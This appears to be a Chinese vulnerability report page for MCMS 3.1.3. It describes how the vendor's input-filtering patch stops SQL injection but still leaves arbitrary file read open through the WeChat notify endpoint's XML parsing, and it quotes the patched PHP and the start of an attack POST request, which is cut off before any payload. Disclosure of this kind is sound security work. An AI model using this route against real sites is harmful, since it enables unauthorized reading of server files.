MCMS 3.1.3 最新版sql注入与任意文件读取

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: rt ### 详细说明: 先看看任意文件读取。 上次提交的这个 [WooYun: mcms v3.1.0 sql注入+任意文件读取。](http://www.wooyun.org/bugs/wooyun-2015-090986) 厂商的做法是 ``` $wx=new weixin(); $_GET = H::sqlxss($_GET); $_POST = H::sqlxss($_POST); ........... function response_msg(){ global $dbm,$C; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; if(!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; ... $keyword = trim($postObj->Content); $keyword = H::sqlxss($keyword); ``` $_GET = H::sqlxss($_GET); $_POST = H::sqlxss($_POST); $keyword = H::sqlxss($keyword);加了这么几句。 注入是不行了。 但是 依然可以任意文件读取啊~ post: ``` POST //app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息